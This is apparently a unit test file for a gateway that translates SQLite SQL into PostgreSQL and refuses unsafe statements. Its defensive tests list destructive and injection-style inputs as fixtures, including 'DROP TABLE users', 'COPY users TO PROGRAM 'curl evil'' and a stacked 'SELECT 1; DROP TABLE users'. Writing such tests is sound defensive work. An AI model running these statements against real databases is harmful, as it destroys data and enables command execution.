/**
 * Unit tests for the SQLite/D1 → PostgreSQL SQL translation.
 * Run with: node --test vps/db-gateway/test/
 */
import test from "node:test";
import assert from "node:assert/strict";
import { translateSql, isSingleStatement, countPlaceholders, maxPlaceholderIndex, assertAllowedStatement, UTC_TIMESTAMP_SQL } from "../sql.mjs";

test("bare ? placeholders become numbered $n in order", () => {
  const out = translateSql("SELECT * FROM users WHERE id = ? AND email = ?");
  assert.equal(out, "SELECT * FROM users WHERE id = $1 AND email = $2");
});

test("?N placeholders keep their explicit index", () => {
  const out = translateSql("SELECT * FROM sources WHERE id = ?1");
  assert.equal(out, "SELECT * FROM sources WHERE id = $1");
});

test("placeholders inside string literals are untouched", () => {
  const out = translateSql("SELECT '?' AS q, ? AS v");
  assert.equal(out, "SELECT '?' AS q, $1 AS v");
  assert.equal(countPlaceholders("SELECT '?' AS q, ? AS v"), 1);
});

test("CURRENT_TIMESTAMP maps to the identical UTC text form", () => {
  const out = translateSql(
    "INSERT INTO user_states (user_id, payload, updated_at) VALUES (?, ?, CURRENT_TIMESTAMP)",
  );
  assert.equal(
    out,
    `INSERT INTO user_states (user_id, payload, updated_at) VALUES ($1, $2, ${UTC_TIMESTAMP_SQL})`,
  );
});

test("CURRENT_TIMESTAMP in a DEFAULT clause is rewritten", () => {
  const out = translateSql(
    "CREATE TABLE IF NOT EXISTS resumes (updated_at TEXT NOT NULL DEFAULT CURRENT_TIMESTAMP)",
  );
  assert.match(out, /DEFAULT to_char\(now\(\) AT TIME ZONE 'UTC'/);
});

test("INSERT OR IGNORE gains ON CONFLICT DO NOTHING", () => {
  const out = translateSql(
    "INSERT OR IGNORE INTO user_states (user_id, email, payload, updated_at) VALUES (?, ?, ?, CURRENT_TIMESTAMP)",
  );
  assert.match(out, /^INSERT INTO user_states /);
  assert.match(out, / ON CONFLICT DO NOTHING$/);
});

test("AUTOINCREMENT becomes an identity column and INTEGER widens to bigint", () => {
  const out = translateSql(
    "CREATE TABLE IF NOT EXISTS resume_versions (id INTEGER PRIMARY KEY AUTOINCREMENT, user_id TEXT NOT NULL)",
  );
  assert.match(out, /id bigint GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY/);
  assert.match(out, /user_id TEXT NOT NULL/);
  assert.ok(!/AUTOINCREMENT/i.test(out));
});

test("REAL widens to double precision", () => {
  assert.match(translateSql("cost_usd REAL NOT NULL DEFAULT 0"), /cost_usd double precision/);
});

test("placeholder numbering is global across literal-separated segments", () => {
  const sql =
    "INSERT INTO admin_memberships (user_id, email, display_name, role, status, scopes, created_by, last_active_at) " +
    "VALUES ('service:sadmin', ?, 'SAdmin Service', 'super_admin', 'active', ?, 'system', CURRENT_TIMESTAMP)";
  const out = translateSql(sql);
  assert.match(out, /VALUES \('service:sadmin', \$1, 'SAdmin Service', 'super_admin', 'active', \$2, 'system'/);
  assert.equal(maxPlaceholderIndex(out), 2);
  assert.equal(countPlaceholders(sql), 2);
});

test("every translated statement binds exactly as many values as it has placeholders", () => {
  const cases = [
    "INSERT INTO users (id, email, display_name) VALUES (?, ?, ?)",
    "INSERT INTO audit_logs (actor_id, action, ip, user_agent) VALUES (?, ?, '', ?)",
    "UPDATE sources SET last_error = ?1, next_scan_at = ?2 WHERE id = ?3",
    "INSERT OR IGNORE INTO user_states (user_id, email, payload, updated_at) VALUES (?, ?, ?, CURRENT_TIMESTAMP)",
  ];
  for (const sql of cases) {
    assert.equal(maxPlaceholderIndex(translateSql(sql)), countPlaceholders(sql), sql);
  }
});

test("destructive and administrative verbs are refused", () => {
  for (const sql of [
    "DROP TABLE users",
    "ALTER TABLE users ADD COLUMN x TEXT",
    "TRUNCATE TABLE jobs",
    "GRANT ALL ON users TO public",
    "CREATE ROLE evil",
    "CREATE DATABASE evil",
    "COPY users TO PROGRAM 'curl evil'",
  ]) {
    assert.throws(() => assertAllowedStatement(sql), /not permitted/, sql);
  }
});

test("the application's real statement shapes are allowed", () => {
  for (const sql of [
    "SELECT * FROM jobs WHERE id = ?",
    "INSERT OR IGNORE INTO user_states (a, b) VALUES (?, ?)",
    "UPDATE sources SET last_error = ? WHERE id = ?",
    "DELETE FROM api_rate_limits WHERE window_start < ?",
    "CREATE TABLE IF NOT EXISTS audit_logs (id INTEGER PRIMARY KEY AUTOINCREMENT)",
    "CREATE INDEX IF NOT EXISTS idx_x ON y (a, b)",
    "CREATE UNIQUE INDEX IF NOT EXISTS idx_z ON q (a) WHERE a <> ''",
    "-- leading comment\nSELECT 1",
  ]) {
    assert.doesNotThrow(() => assertAllowedStatement(sql), sql);
  }
});

test("the real ORDER BY / ON CONFLICT upsert statement round-trips", () => {
  const sql = `INSERT INTO user_state_documents (user_id, document_key, payload, revision, updated_at)
     VALUES (?, ?, ?, 1, CURRENT_TIMESTAMP)
     ON CONFLICT(user_id, document_key) DO UPDATE SET
       payload = excluded.payload,
       revision = user_state_documents.revision + 1,
       updated_at = CURRENT_TIMESTAMP`;
  const out = translateSql(sql);
  assert.match(out, /VALUES \(\$1, \$2, \$3, 1, to_char\(now\(\) AT TIME ZONE 'UTC'/);
  assert.match(out, /ON CONFLICT\(user_id, document_key\) DO UPDATE SET/);
  assert.ok(!/\?/.test(out));
});

test("multi-statement payloads are detected", () => {
  assert.equal(isSingleStatement("SELECT 1"), true);
  assert.equal(isSingleStatement("SELECT 1;"), true);
  assert.equal(isSingleStatement("SELECT 1; DROP TABLE users"), false);
  assert.equal(isSingleStatement("SELECT ';' AS semi"), true);
});

test("statement numbering skips literals but counts all placeholders", () => {
  const sql = "UPDATE sources SET last_error = ?1, next_scan_at = ?2, updated_at = ?3 WHERE id = ?4";
  assert.equal(countPlaceholders(sql), 4);
  assert.equal(
    translateSql(sql),
    "UPDATE sources SET last_error = $1, next_scan_at = $2, updated_at = $3 WHERE id = $4",
  );
});
